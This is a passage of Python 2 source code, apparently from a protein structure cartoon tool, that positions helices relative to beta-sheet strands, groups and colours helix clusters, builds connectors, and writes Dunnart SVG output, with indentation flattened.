# i.e. below the sheet if after in sequence, above if before.
(sheet_id, nterm_strand_index, cterm_strand_index) = \
self.immediate_containing_sheet(node_index,
node.get_chainid())
nterm_strand = None
cterm_strand = None
if nterm_strand_index != None or cterm_strand_index != None:
seqpos = None
if cterm_strand_index == None:
nterm_strand = nodelist[nterm_strand_index]
seq_strand = nterm_strand
seqpos = SEQPOS_AFTER
elif nterm_strand_index == None:
cterm_strand = nodelist[cterm_strand_index]
seq_strand = cterm_strand
seqpos = SEQPOS_BEFORE
else:
# we have a choice between the axis on which the
# n-terminal or c-terminal strand is aligned.
# Choose one with no helices already aligned on it,
# if possible
# but first check (even if enable_sheet_gap_rule not True)
# if it would be a 'sheet gap' helix in one position and
# not the other, and choose the one in which it isn't if
# possible.
nterm_strand = nodelist[nterm_strand_index]
cterm_strand = nodelist[cterm_strand_index]
(num_helices_above_nterm_strand,
num_helices_below_nterm_strand) = \
self.count_helices_on_strand_axis(nterm_strand,
strand_ypos_dict)
(num_helices_above_cterm_strand,
num_helices_below_cterm_strand) = \
self.count_helices_on_strand_axis(cterm_strand,
strand_ypos_dict)
seqpossg = SEQPOS_AFTER
if nterm_strand.get_reversed():
if seqpossg == SEQPOS_AFTER:
seqpossg = SEQPOS_BEFORE
else:
seqpossg = SEQPOS_AFTER
nterm_is_sheet_gap = self.helix_is_sheet_gap(node, nterm_strand,
cterm_strand,
seqpossg,
nterm_strand,
sheet_posmap)
seqpossg = SEQPOS_BEFORE
if cterm_strand.get_reversed():
if seqpossg == SEQPOS_AFTER:
seqpossg = SEQPOS_BEFORE
else:
seqpossg = SEQPOS_AFTER
cterm_is_sheet_gap = self.helix_is_sheet_gap(node, nterm_strand,
cterm_strand,
seqpossg,
cterm_strand,
sheet_posmap)
# print 'xxx',str(node),'nterm',nterm_is_sheet_gap,'cterm',cterm_is_sheet_gap
if (nterm_is_sheet_gap and not cterm_is_sheet_gap):
seq_strand = cterm_strand
seqpos = SEQPOS_BEFORE
elif (cterm_is_sheet_gap and not nterm_is_sheet_gap):
seq_strand = nterm_strand
seqpos = SEQPOS_AFTER
elif ( (not nterm_strand.get_reversed() and
num_helices_above_nterm_strand == 0) or
(nterm_strand.get_reversed() and
num_helices_below_nterm_strand == 0) ):
seq_strand = nterm_strand
seqpos = SEQPOS_AFTER
elif ( (not cterm_strand.get_reversed() and
num_helices_below_cterm_strand == 0) or
(cterm_strand.get_reversed() and
num_helices_above_cterm_strand == 0) ):
seq_strand = cterm_strand
seqpos = SEQPOS_BEFORE
else:
#use closest strand in sequence (n-terminal if tied)
nterm_dist = node_index - nterm_strand_index
cterm_dist = cterm_strand_index - node_index
assert(nterm_dist > 0)
assert(cterm_dist > 0)
if cterm_dist < nterm_dist:
seq_strand = nodelist[cterm_strand_index]
seqpos = SEQPOS_BEFORE
else:
seq_strand = nodelist[nterm_strand_index]
seqpos = SEQPOS_AFTER
if seq_strand.get_reversed():
if seqpos == SEQPOS_AFTER:
seqpos = SEQPOS_BEFORE
else:
seqpos = SEQPOS_AFTER
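# (Placement side follows strand direction: e.g. a helix drawn after an
# upward-pointing strand goes above the sheet, but below it when the
# strand is reversed, hence the seqpos swap above.)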
# for multiple helices adjacent in sequence, process them
# all in the same way in an inner loop here.
# We do this by making a new list of only these adjacent
# helices (maybe with terminus), so that we can
# reverse it if necessary.
helix_list = []
while not isinstance(node, PTNodeStrand): # always at least once
if ( isinstance(node, PTNodeHelix) and
( (node.get_type() == "310" and
not self.include_310_helices) or
(node.get_type() == "PI" and
not self.include_pi_helices) ) ):
node_index += 1
if node_index >= len(nodelist):
break
node = nodelist[node_index]
continue # 310 or pi helix & we're not drawing them
if not node.get_is_positioned():
helix_list.append(node)
node_index += 1
if node_index >= len(nodelist):
break
node = nodelist[node_index]
is_helix_cluster = False
if use_helix_clustering:
helix_cluster_list = [ helix for helix in helix_list
if isinstance(helix, PTNodeHelix) ]
if len(helix_cluster_list) > MIN_HELIX_CLUSTER_SIZE:
is_helix_cluster = True
# if the list of helices would be between two sheets
# and is long enough that we don't want it to get in
# the way there, then put them on unpositioned list
# to be positioned by distance matrix method later instead.
total_helix_len = sum([helix.get_span() for helix in
helix_list if
isinstance(helix, PTNodeHelix)]) * \
DUNNART_HELIX_SPAN_FACTOR
if (enable_sheet_gap_rule and
total_helix_len > SHEET_GAP_HELIX_LEN and
self.helix_is_sheet_gap(helix_list[0], nterm_strand,
cterm_strand, seqpos,
seq_strand, sheet_posmap,
is_helix_cluster)):
if verbose:
sys.stderr.write('intersheet helices: ' +
str([str(helix) for helix in helix_list]) +
'\n')
if is_helix_cluster:
unpositioned_helix_clusters.append((helix_cluster_list,
seq_strand,
None)) # no seqpos
for tnode in [tn for tn in helix_list if
isinstance(tn, PTNodeTerminus)]:
unpositioned_termini.append((tnode, nodelist))
else:
for node in helix_list:
if isinstance(node, PTNodeHelix):
unpositioned_helices.append((node, seq_strand))
# FIXME: should change the name of the
# is_interstrand flag now it is used here
# also.
node.set_is_interstrand(True)
elif isinstance(node, PTNodeTerminus):
unpositioned_termini.append((node, nodelist))
else:
assert(False)
# node_index already incremented in loop building
# helix_list, so don't need to increment it to continue
return node_index # we do not write this one now
# reverse the list if it is below an upwards (non-reversed)
# strand that is after (c-terminal to) it
# or vice versa (reversed strand n-terminal to it)
if seqpos == SEQPOS_BEFORE and not seq_strand.get_reversed() or\
seqpos == SEQPOS_AFTER and seq_strand.get_reversed():
helix_list.reverse()
if ( isinstance(helix_list[-1], PTNodeHelix) and
(self.pdb_resid_dict[(seq_strand.get_chainid(),
seq_strand.get_start_res_seq())] >
self.pdb_resid_dict[(helix_list[-1].get_chainid(),
helix_list[-1].get_start_res_seq())]) ):
# aligned on C-terminal strand, set last in list flag
helix_list[-1].set_is_last_in_seq(True)
helix_list[-1].set_reversed(seq_strand.get_reversed())
if is_helix_cluster:
# just put helix clusters on a list to process after all
# aligned helices are processed, since we need the aligned
# helices there to see if helix clusters would overlap
# with them.
unpositioned_helix_clusters.append((helix_cluster_list,
seq_strand,
seqpos))
for tnode in [tn for tn in helix_list if
isinstance(tn, PTNodeTerminus)]:
unpositioned_termini.append((tnode, nodelist))
else:
for node in helix_list:
if isinstance(node, PTNodeHelix):
height = node.get_span() * DUNNART_HELIX_SPAN_FACTOR
width = DUNNART_HELIX_WIDTH
node.set_reversed(seq_strand.get_reversed())
elif isinstance(node, PTNodeTerminus):
width = DUNNART_TERMINUS_SIZE
height = DUNNART_TERMINUS_SIZE
else:
assert(False)
(ypos_above, ypos_below,sideways,
num_helices_aligned_above,
num_helices_aligned_below)= \
strand_ypos_dict[seq_strand.nodeid]
if sideways:
temp = height
height = width
width = temp
helix_extent = width
node.set_sideways(True)
node_ypos = seq_strand.ypos
else:
node_xpos = seq_strand.xpos
helix_extent = height
offset = get_min_gap_size()
if seqpos == SEQPOS_AFTER:
if sideways:
node_xpos = ypos_above - offset - helix_extent
new_above_pos = node_xpos
else:
node_ypos = ypos_above - offset - helix_extent
new_above_pos = node_ypos
strand_ypos_dict[seq_strand.nodeid] = \
(new_above_pos, ypos_below, sideways,
num_helices_aligned_above + 1,
num_helices_aligned_below)
else:
if sideways:
node_xpos = ypos_below + offset
new_below_pos = node_xpos + helix_extent
else:
node_ypos = ypos_below + offset
new_below_pos = node_ypos + helix_extent
strand_ypos_dict[seq_strand.nodeid] = \
(ypos_above, new_below_pos, sideways,
num_helices_aligned_above,
num_helices_aligned_below + 1)
if isinstance(node, PTNodeHelix):
self.set_helix_svginfo(node,
node_xpos, node_ypos,
sse_label_scheme,
seqnum_dict,
label_residue_numbers)
elif isinstance(node, PTNodeTerminus):
if ( interdomain_connectors and
isinstance(node, PTNodeTerminus) and
node.get_pseudo() ):
node_index += 1
continue # not drawing pseudo-termini
else:
self.set_terminus_svginfo(node,
node_xpos, node_ypos)
else:
assert(False)
# Also for helices (and termini)
# that are just before or after strand in sequence,
# put them on the vert indguide for that strand
if sideways:
align_type = DUNNART_ALIGN_MIDDLE
else:
align_type = DUNNART_ALIGN_CENTER
self.svg_constraint_list.append(
PTSVGAlignmentConstraint(seq_strand.indguide,
node,
align_type))
# END of inner (for) loop over adjacent helices in helix_list
# END of else case (not using helix clustering)
else: # of nterm_strand_index != None or cterm_strand_index != None:
if isinstance(node, PTNodeHelix):
# no strand in this chain so we can't position helix
# on a strand indguide - we will use the distance
# matrix placement method instead:
# find the sheet closest to this helix
# (there must be some sheet already placed (in another
# chain(s)) otherwise the -i option (distance matrix
# method) would have been forced on and we wouldn't
# be in this subroutine.)
(closest_sheetid, unused_dist) = \
self.distmatrix.get_min_distance_objid(node.nodeid,
Set(),
sheets_only=True)
if verbose:
sys.stderr.write('positioning ' + str(node) +
' relative to ' +
'sheet ' + closest_sheetid +
'\n')
# position the element near its closest already
# positioned one according to position map for
# relative position and tableau for orientation
(relpos, pos_strand, cur_strand) = \
self.ptrelpos.get_relative_position(closest_sheetid,
node)
(node_xpos, node_ypos) = \
self.relpos_to_pos(closest_sheetid,
node,
relpos,
pos_strand, cur_strand,
sheet_pos_dict)
self.set_helix_svginfo(node,
node_xpos, node_ypos,
sse_label_scheme,
seqnum_dict,
label_residue_numbers)
node_index += 1 # needed to continue loop in calling routine
elif isinstance(node, PTNodeTerminus):
# add these to a list to process later, since we
# want to place all helices first to ensure we
# always have a real SSE to place terminus near to
unpositioned_termini.append((node, nodelist))
node_index += 1 # needed to continue loop
return node_index # we do not write this one now
else:
assert(False)
return node_index
def build_helix_cluster(self,
sse_label_scheme,
seqnum_dict,
strand_ypos_dict,
seq_strand,
seqpos,
helix_list,
helix_cluster_id,
helix_cluster_shading_color,
sheet_posmap = None,
sheet_pos_dict = None,
label_residue_numbers = False):
"""
Build a 'cluster' of helices that are in sequence between two
strands. Called by build_helices_heuristic().
Parameters:
sse_label_scheme - if 'sequential' number all nodes in one sequence
instead of separate sequences for strands and helices.
Note that this does not affect internal numbering, it is
just for the labels on Dunnart shapes.
seqnum_dict - dictionary { nodeid : seqnum } only used if
sse_label_scheme is 'sequential'
strand_ypos_dict - (IN/OUT)
The strand_ypos_dict from build_helices_svg():
{ nodeid : (ypos_above, ypos_below, sideways,
num_helices_aligned_above, num_helices_aligned_below) }
e.g. { 'STRAND_1' : (70, 330, False, 0, 1) }
seq_strand - The PTNodeStrand that the first helix in the list
is closest in sequence to, used to align that helix.
seqpos - SEQPOS_AFTER or _BEFORE as calculated
in build_helices_svg()
or None if we cannot place cluster aligned on strand
(due to helix sheet gap rule), in which case
we place it using distance matrix placement.
helix_list - list of helices in chain to process
helix_cluster_id - integer id for this helix cluster
helix_cluster_shading_color - color to shade the helix cluster
sheet_posmap - The PTPosMap of sheet neighbour relationships
Only used if seqpos==None. Default None.
sheet_pos_dict -
dictionary mapping from sheet id to top and
bottom of sheet y co-ordinate and left
and right x co-ordinate:
{ sheet_id : (top_ypos, bottom_ypos,
left_xpos,right_xpos) }
Only used if seqpos==None. Default None.
label_residue_numbers - if True put start and end residue ids
on head and tail of helix shape
Uses data members (readonly):
node_list - ordered list of nodes
(NOTE: sets is_positioned, is_interstrand flag in helices though)
(write):
helix_cluster_list - list of PTSVGCluster
helix_cluster_dict - maps cluster id to PTSVGCluster object
svg_constraint_list
Return value:
None
"""
assert(seqpos in [None, SEQPOS_AFTER, SEQPOS_BEFORE])
assert(len(helix_list) > 0)
if not self.room_for_helix_cluster(seq_strand, seqpos,
strand_ypos_dict):
if verbose:
sys.stderr.write('no room for helix cluster ' + str([str(h) for h in helix_list]) + '\n')
seqpos = None # force distance matrix placement not strand alignment
node = helix_list[0]
height = node.get_span() * DUNNART_HELIX_SPAN_FACTOR
width = DUNNART_HELIX_WIDTH
(ypos_above, ypos_below,sideways,
num_helices_aligned_above,
num_helices_aligned_below)= \
strand_ypos_dict[seq_strand.nodeid]
if sideways:
temp = height
height = width
width = temp
helix_extent = width
node.set_sideways(True)
node_ypos = seq_strand.ypos
else:
node_xpos = seq_strand.xpos
helix_extent = height
offset = get_min_gap_size()
if seqpos == None:
(node_xpos,node_ypos) = self.find_helix_xypos(node, seq_strand,
sheet_posmap,
sheet_pos_dict,
True) # sheet gap
elif seqpos == SEQPOS_AFTER:
if sideways:
node_xpos = ypos_above - offset - helix_extent
new_above_pos = node_xpos
else:
node_ypos = ypos_above - offset - helix_extent
new_above_pos = node_ypos
strand_ypos_dict[seq_strand.nodeid] = \
(new_above_pos, ypos_below, sideways,
num_helices_aligned_above + 1,
num_helices_aligned_below)
else: # SEQPOS_BEFORE
if sideways:
node_xpos = ypos_below + offset
new_below_pos = node_xpos + helix_extent
else:
node_ypos = ypos_below + offset
new_below_pos = node_ypos + helix_extent
strand_ypos_dict[seq_strand.nodeid] = \
(ypos_above, new_below_pos, sideways,
num_helices_aligned_above,
num_helices_aligned_below + 1)
node.set_is_interstrand(True) # FIXME: should change name of this flag
self.set_helix_svginfo(node, node_xpos, node_ypos,
sse_label_scheme,
seqnum_dict,label_residue_numbers)
# Put the first helix on the list, i.e. the one that
# is just before or after the strand in sequence,
# on the vert indguide for that strand,
# unless seqpos=None, indicating the helix cannot be aligned on
# the strand due to the helix sheet gap rule
if seqpos != None:
if sideways:
align_type = DUNNART_ALIGN_MIDDLE
else:
align_type = DUNNART_ALIGN_CENTER
self.svg_constraint_list.append(
PTSVGAlignmentConstraint(seq_strand.indguide,
node,
align_type))
# Now position the rest of the helices using the distance matrix
# and tableau
# dict { PTNodeHelix : PTNodeStrand } mapping, for a positioned helix,
# the strand used as the reference to position it on its axis
helix_refstrand_dict = {}
positioned_elements = Set([node])
unpositioned_elements = Set(helix_list[1:])
# print 'xxx',str([str(node) for node in unpositioned_elements])
firsthelix = True
while (len(unpositioned_elements) > 0):
# find nearest element to any already positioned element in cluster
(positioned_element, cur_element, dist_unused) = \
self.distmatrix.find_nearest_sses_in_sets( \
positioned_elements,
unpositioned_elements)
if verbose:
sys.stderr.write('build_helix_cluster positioning ' +
str(cur_element) +
' relative to ' +
str(positioned_element) + '\n')
# position the element near its closest already positioned one
# according to position map for relative position and tableau
# for orientation
if firsthelix:
ref_strand = seq_strand
helix_refstrand_dict[positioned_element] = seq_strand
firsthelix = False
else:
ref_strand = helix_refstrand_dict[positioned_element]
(relpos, test_strand) = \
self.ptrelpos.get_helixcluster_relative_position(
positioned_element,
cur_element,
ref_strand)
helix_refstrand_dict[cur_element] = test_strand
assert(isinstance(cur_element, PTNodeHelix))
cur_element.set_is_interstrand(True) # FIXME: change name of flag
(xpos, ypos) = self.relpos_to_pos(positioned_element,
cur_element,
relpos,
None, None,
sheet_pos_dict=None)
self.set_helix_svginfo(cur_element,
xpos, ypos,
sse_label_scheme,
seqnum_dict,label_residue_numbers)
positioned_elements.add(cur_element)
unpositioned_elements.remove(cur_element)
shading_color = get_color_list(helix_cluster_shading_color)[0] +\
DUNNART_CLUSTER_ALPHA_HEX
helixcluster = PTSVGCluster(helix_list,
self.xmlid_generator.next(),
str(helix_cluster_id),
0, # color_num used for proximity grouping
shading_color)
self.helix_cluster_list.append(helixcluster)
self.helix_cluster_dict[helix_cluster_id] = helixcluster
if verbose:
sys.stderr.write('build_helix_cluster: helices ' +
str([str(helix) for helix in helix_list]) +
'are in cluster ' + str(helix_cluster_id) + '\n')
def build_connectors_aligned_svg(self, nodelist,
chain_i,
use_connector_arrowheads=False,
connector_color_scheme = 'all',
interdomain_connectors = False):
"""
Called by build_dunnart_svg() to
build SVG for connectors for sequence in a single chain:
a connector between each
node (helix/strand) in sequence order.
This is the original version for use with heuristic helix
placement (i.e. no -i option) along with build_helices_svg(). It puts
connectors on ports of helices simply to try to avoid
unnecessary crossings assuming they are aligned in order along
strand axes, ignoring any tableau orientation they are
supposed to have.
Parameters:
nodelist - list of nodes in this chain
chain_i - chain index (0,1,...) for selecting line color
use_connector_arrowheads - If True make connectors directed.
connector_color_scheme - 'all[:<color>]', 'chain[:<color_list>]',
'domain[:<intra_color>,<inter_color>]',
'crossing[:<color_list>]'
interdomain_connectors - If True, do NOT make
pseudo-terminus nodes
at domain boundaries. Instead the domain boundary
SSEs are left to have connectors to the other domain
added later. Default False.
Uses data members (readonly):
node_list - ordered list of nodes (NB sets port fields in SVGNodes)
include_pi_helices, include_310_helices
Return value:
the new current XML id
Precondition: nodelist is sorted (by start res seq ascending);
this is done by build_graph_from_secstruct()
before calling.
"""
prevnode = None
prevdstFlags = None
for nodeindex in range(len(nodelist)):
node = nodelist[nodeindex]
if isinstance(node, PTNodeHelix):
if ( (node.get_type() == "310" and
not self.include_310_helices) or
(node.get_type() == "PI" and
not self.include_pi_helices) ):
continue # skip 310/pi helix if flagged to not draw
if ( interdomain_connectors and
isinstance(node, PTNodeTerminus) and node.get_pseudo() ):
continue # don't do pseudo for interdomain
if prevnode != None:
# add connector from prevnode to node
if isinstance(node, PTNodeStrand):
dst_reversed = node.get_reversed()
else:
dst_reversed = False
if dst_reversed:
dstFlags = DUNNART_TOP_PORT
else:
dstFlags = DUNNART_BOTTOM_PORT
if prevdstFlags == None:
if isinstance(prevnode, PTNodeStrand):
src_reversed = prevnode.get_reversed()
else:
src_reversed = False
if src_reversed:
srcFlags = DUNNART_BOTTOM_PORT
else:
srcFlags = DUNNART_TOP_PORT
else:
if prevdstFlags == DUNNART_TOP_PORT or \
prevdstFlags == DUNNART_LEFT_PORT:
srcFlags = DUNNART_BOTTOM_PORT
else:
srcFlags = DUNNART_TOP_PORT
if isinstance(node, PTNodeHelix):
if node.get_sideways():
prevnode_ypos = prevnode.xpos # x coord
node_ypos = node.xpos # x coord
else:
prevnode_ypos = prevnode.ypos # y coord
node_ypos = node.ypos # y coord
if node.get_is_interstrand():
# special case for helices between strands on same
# axis in sheet
if node.get_reversed(): # N-term strand reversed value
dstFlags = DUNNART_TOP_PORT
else:
dstFlags = DUNNART_BOTTOM_PORT
elif node.get_is_last_in_seq():
if node.get_reversed(): # axis strand reversed value
dstFlags = DUNNART_TOP_PORT
else:
dstFlags = DUNNART_BOTTOM_PORT
else:
if prevnode_ypos < node_ypos:
dstFlags = DUNNART_TOP_PORT
prevdstFlags = dstFlags
if not isinstance(node, PTNodeStrand):
srcFlags = DUNNART_BOTTOM_PORT
if node.get_sideways():
if dstFlags == DUNNART_TOP_PORT:
dstFlags = DUNNART_LEFT_PORT
else:
dstFlags = DUNNART_RIGHT_PORT
if prevnode.get_sideways():
if srcFlags == DUNNART_TOP_PORT:
srcFlags = DUNNART_LEFT_PORT
else:
srcFlags = DUNNART_RIGHT_PORT
if isinstance(node, PTNodeTerminus):
dstFlags = DUNNART_DEFAULT_PORT
elif isinstance(prevnode, PTNodeTerminus):
srcFlags = DUNNART_DEFAULT_PORT
# line color may be overwritten later for multidomain
linecolor = get_line_color(connector_color_scheme, chain_i)
node.nterm_port = dstFlags
prevnode.cterm_port = srcFlags
xmlid = self.xmlid_generator.next()
self.svg_connector_list.append(
PTSVGConnector(xmlid, prevnode, node, srcFlags, dstFlags,
linecolor, use_connector_arrowheads))
prevdstFlags = dstFlags
prevnode = node
def set_helix_cluster_colors(self, helix_proximity_shading_colors,
helix_cluster_shading_color):
"""
Set shading colors for helix clusters.
Color nearby helix clusters
the same shading color. Note that this may involve
making some helices a one-helix 'cluster'.
Called by build_dunnart_svg().
Parameters:
helix_proximity_shading_colors - shade nearby helix clusters the same
color: 'auto' (use color gradient
to shade each differently),
or list of colors.
helix_cluster_shading_color - default color to shade helix clusters
Uses data members (read/write):
helix_cluster_id_generator
helix_cluster_list
helix_cluster_dict - dict { clusterid : PTSVGCluster }
xmlid_generator
Return value:
None
"""
assert(helix_proximity_shading_colors != None)
num_clusters = len(self.helix_cluster_list)
if num_clusters < 1:
return
cluster_fill_colors = get_cluster_fill_colors(
helix_proximity_shading_colors,
num_clusters)
if helix_proximity_shading_colors != 'auto':
# put standard (-k) cluster fill color at index 0 for clusters not assigned to a group
default_shading_color = \
get_color_list(helix_cluster_shading_color)[0] +\
DUNNART_CLUSTER_ALPHA_HEX
cluster_fill_colors.insert(0, default_shading_color)
color_num = 1 # NB start at 1 not 0; 0 used to mark non-assigned cluster
self.helix_cluster_list[0].color_num = color_num
self.helix_cluster_list[0].color = cluster_fill_colors[color_num]
# for every existing helix cluster, find the nearest helix to
# any helix in the cluster. If it is below the distance threshold,
# then make the cluster that helix is in the same color. If it is
# not in a cluster then make it a cluster and color it the same color
# FIXME: this is being done very inefficiently, constructing lots
# of sets from list of all helices and using set difference, should
# build one set then add/subtract things from it.
HELIX_CLUSTER_NEARBY_THRESHOLD = 7.0 # Angstroms. FIXME: adaptive?
cluster_list = list(self.helix_cluster_list) # NB a copy not reference
# What about transitivity? This way cluster 2
# might be near cluster 1, so same color, then cluster
# 3 near 2, also same color, but might not be near cluster
# 1 at all, but ends up same color as it (via 2).
# We resolve this by insisting all clusters are
# pairwise 'close'.
# TODO: FIXME: this is not so good either, as the result depends
# on order things are processed in. E.g (7API) have cluster of helices
# B,C,D then look at E it is close, then A, but it is not close to E
# so not in group.
# But for 1SNG, A gets processed before E so get A in group with B,C,D
# and not E.
# In both cases, A and E are close to B,C,D cluster but not to
# each other. What should be done?
# XXXX 15Feb2008 - greedy algorithm of
# sorting nearby clusters by distance and using
# closest first now implemented, not sure it is what we want though
# e.g 1SNG now getting helix H close not E, 7API gets A and E.
# We'll call the set of clusters that are the same color a 'group'
group_dict = {} # dict of { color_num : list of PTSVGCluster }
grouped_clusters = Set() # Set of PTSVGCluster that are in some group
for helixcluster in cluster_list:
if helixcluster in grouped_clusters:
continue # this cluster already in a group, skip it
cluster_helix_set = Set(helixcluster.svgnodelist)
other_helix_set = Set(list(self.iter_helices())) \
- cluster_helix_set
close_list = self.distmatrix.find_nearby_sses_in_sets(
cluster_helix_set, other_helix_set,
HELIX_CLUSTER_NEARBY_THRESHOLD) # returns (dist, helix) tuples
close_list.sort() # sort by distance (ascending)
if verbose:
sys.stderr.write('set_helix_cluster_colors: helices ' +
str([str(helix) for (dist, helix) in close_list]) +
' are close to helix cluster ' +
helixcluster.clusterid + ' (' +
str([str(helix) for helix in cluster_helix_set]) +
')\n')
for (dist, nearby_helix) in close_list:
if nearby_helix.get_cluster_id() != None:
nearby_cluster = \
self.helix_cluster_dict[nearby_helix.get_cluster_id()]
if verbose:
sys.stderr.write(' nearby helix ' +
str(nearby_helix) +
' is in cluster ' +
nearby_cluster.clusterid + '\n')
else:
# not in a cluster, make one just for this helix
helix_cluster_id = self.helix_cluster_id_generator.next()
nearby_cluster = PTSVGCluster([nearby_helix],
self.xmlid_generator.next(),
str(helix_cluster_id))
nearby_helix.set_cluster_id(helix_cluster_id)
self.helix_cluster_list.append(nearby_cluster)
self.helix_cluster_dict[helix_cluster_id] = nearby_cluster
if verbose:
sys.stderr.write(' clusters ' +
helixcluster.clusterid +
' and single helix ' +
str(nearby_helix) +
' (now cluster ' +
str(helix_cluster_id ) +
') ' +
' are close\n')
assert(nearby_cluster != helixcluster)
if ( not group_dict.has_key(color_num) or
len(group_dict[color_num]) < 2 ):
all_close = True
else:
all_close = True
test_helix_set = Set(nearby_cluster.svgnodelist)
for ref_cluster in group_dict[color_num]:
ref_helix_set = Set(ref_cluster.svgnodelist)
(ref_elt, test_elt, dist) = \
self.distmatrix.find_nearest_sses_in_sets(
ref_helix_set, test_helix_set)
if dist >= HELIX_CLUSTER_NEARBY_THRESHOLD:
all_close = False
if verbose:
sys.stderr.write(' cluster ' +
nearby_cluster.clusterid +
' is not close to cluster ' +
str(ref_elt.get_cluster_id()) +
'; not adding to group\n')
break
if all_close:
if nearby_cluster.color_num == 0:
thiscolornum = helixcluster.color_num
nearby_cluster.color_num = thiscolornum
nearby_cluster.color = cluster_fill_colors[thiscolornum]
else:
thiscolornum = nearby_cluster.color_num
if not group_dict.has_key(thiscolornum):
group_dict[thiscolornum]=[helixcluster, nearby_cluster]
grouped_clusters.add(nearby_cluster)
grouped_clusters.add(helixcluster)
else:
group_dict[thiscolornum].append(nearby_cluster)
grouped_clusters.add(nearby_cluster)
if verbose:
sys.stderr.write(' clusters ' +
helixcluster.clusterid +
' and ' +
nearby_cluster.clusterid +
' are close, colored with ' +
'color number ' + str(thiscolornum) +
'\n')
color_num += 1
# now remove all single-helix clusters that are not in any group
# They are all added by this subroutine so at end of cluster_list
if verbose:
sys.stderr.write(str([str(c) for c in self.helix_cluster_list])
+ '\n')
i = len(self.helix_cluster_list) - 1
while i > 0 and len(self.helix_cluster_list[i].svgnodelist) == 1:
if (self.helix_cluster_list[i].color_num == 0):
removed_cluster = self.helix_cluster_list.pop(i)
if verbose:
sys.stderr.write(' helix ' +
str(removed_cluster.svgnodelist[0]) +
' (cluster ' +
removed_cluster.clusterid + ')' +
' not in any group so no longer a cluster\n')
i -= 1
##########################################################################
#
# functions that operate on PTSVGNodes xpos,ypos etc. having
# already been built by build_dunnart_svg()
#
def get_bounding_box(self):
"""
Get a bounding box for the cartoon based on all the SVG nodes
generated already by build_dunnart_svg().
Parameters:
None
Return value:
Tuple of tuples ((x1, y1), (x2, y2)) where (x1,y1) is the top
left corner of the bounding box and (x2,y2) is the bottom right
corner of the bounding box.
"""
x1 = y1 = sys.maxint
x2 = y2 = -sys.maxint - 1
for node in self.iter_nodes():
if node.get_is_positioned():
if node.xpos - node.width < x1:
x1 = node.xpos - node.width
if node.xpos + node.width > x2:
x2 = node.xpos + node.width
if node.ypos - node.height < y1:
y1 = node.ypos - node.height
if node.ypos + node.height > y2:
y2 = node.ypos + node.height
return ((x1, y1), (x2,y2))
def scale(self, scale_factor):
"""
Scale the cartoon by uniform scaling. Can be used as primitive
way of ensuring no overlaps.
Parameters:
scale_factor - factor to multiply all coordinates by
Return value:
None
Updates xpos,ypos in all SVGNodes in the nodelist.
"""
for node in self.iter_nodes():
if node.get_is_positioned():
node.xpos *= scale_factor
node.ypos *= scale_factor
def translate_relative_bbox(self, bounding_box, relpos):
"""
Translate the cartoon to a position ABOVE, BELOW, LEFT or RIGHT of
the supplied bounding_box (specified by tuple of
top-left and bottom-right
(x,y) tuples). Leaves an additional gap of DUNNART_DOMAIN_GAP_SIZE.
Parameters:
bounding_box - Tuple of tuples ((x1, y1), (x2, y2)) where
(x1,y1) is the top
left corner of the bounding box and (x2,y2) is
the bottom right corner of the bounding box.
relpos - ptrelpos.py RELPOS_ABOVE/BELOW/LEFT/RIGHT to position
relative to the bounding box,
or None to move it to the same position as the bounding box.
Return value:
None.
Updates xpos,ypos in all SVGNodes in the nodelist.
Note must also update x/y for indguides and distribution handles
Raises exceptions:
ValueError for bad relpos value
"""
(x1, y1) = bounding_box[0]
(x2, y2) = bounding_box[1]
this_bounding_box = self.get_bounding_box()
(this_x1, this_y1) = this_bounding_box[0]
(this_x2, this_y2) = this_bounding_box[1]
xshift = 0
yshift = 0
if relpos == None:
xshift = -(this_x1 - x1)
yshift = -(this_y1 - y1)
elif relpos == RELPOS_ABOVE:
yshift = -(abs(this_y2 - y1) + DUNNART_DOMAIN_GAP_SIZE)
elif relpos == RELPOS_BELOW:
yshift = abs(y2 - this_y1) + DUNNART_DOMAIN_GAP_SIZE
elif relpos == RELPOS_LEFT:
xshift = -(abs(this_x2 - x1) + DUNNART_DOMAIN_GAP_SIZE)
elif relpos == RELPOS_RIGHT:
xshift = abs(x2 - this_x1) + DUNNART_DOMAIN_GAP_SIZE
else:
raise ValueError('bad relpos value ' + str(relpos))
# move shapes
for node in self.iter_nodes():
if node.get_is_positioned():
if relpos == None:
node.ypos += yshift
node.xpos += xshift
elif relpos == RELPOS_ABOVE or relpos == RELPOS_BELOW:
node.ypos += yshift
elif relpos == RELPOS_LEFT or relpos == RELPOS_RIGHT:
node.xpos += xshift
else:
raise ValueError('bad relpos value ' + str(relpos))
# move indguides and handles
for svgconstraint in self.svg_constraint_list:
svgconstraint.translate(xshift, yshift)
def write_dunnart_svg(self, fh):
"""
Write the SVG to the supplied file using the SVG nodes built by
build_dunnart_svg()
Parameters:
fh - filehandle open for writing, to write SVG to.
Return value:
None
"""
#
# write the SVG to the file
#
# write out the svg that has been built for each node
for node in self.iter_nodes():
if node.get_is_positioned(): # e.g. 3_10, pi helices may not be
node.write_svg(fh)
# write out the cluster constraints (for sheets and helix clusters)
for cluster in self.sheet_cluster_list + self.helix_cluster_list:
cluster.write_svg(fh)
# write out the alignment and distribution constraints
for svgconstraint in self.svg_constraint_list:
svgconstraint.write_svg(fh)
# write out the connectors
for connector in self.svg_connector_list:
connector.write_svg(fh)
##########################################################################
#-----------------------------------------------------------------------------
#
# Function definitions
#
#-----------------------------------------------------------------------------
def get_simple_colors(color_scheme):
"""
Return the rgb color tuples for the colors specified for the 'simple'
color scheme, which is in the format
'simple:sheet=<sheet_colors>.helixcluster=<helixcluster_color>.alpha=<helix_alpha_colors>.pi=<helix_pi_colors>.310=<helix_310_colors>.terminus=<terminus_colors>'
This colors strands in sheets with the sheet colors, helices in helix
clusters (if any) with the helixcluster color, and other helices with
the alpha, pi or 310 helix colors as appropriate.
The color lists are comma-delimited lists of recognized color names
or RGB colors in hex (e.g. sheet=red,purple,#ddf02d).
This format is assumed to have already been validated by the parameter
parsing in main(), by regular expression (but we check for duplicate
type names here as that is simpler than in a regexp - also for valid
colors; this function is called as part of command line validation).
Parameters:
color_scheme: string starting 'simple:' as specified above
Return value:
dict { type : color_list } where type is 'sheet','helixcluster',
'alpha','pi' or '310' and color_list is list of color value strings
where the color value strings are 'rrggbb' color
hex strings (note no '#')
Raises exceptions:
KeyError for unknown color names
ValueError for duplicate type names
"""
type_color_dict = {}
if color_scheme[:7] != "simple:":
return None # should be validated before entering this function
type_eq_value_list = color_scheme[7:].split('.')
for type_eq_value in type_eq_value_list:
type_value = type_eq_value.split('=')
typestr = type_value[0]
if type_color_dict.has_key(typestr):
raise ValueError("duplicate type " + typestr)
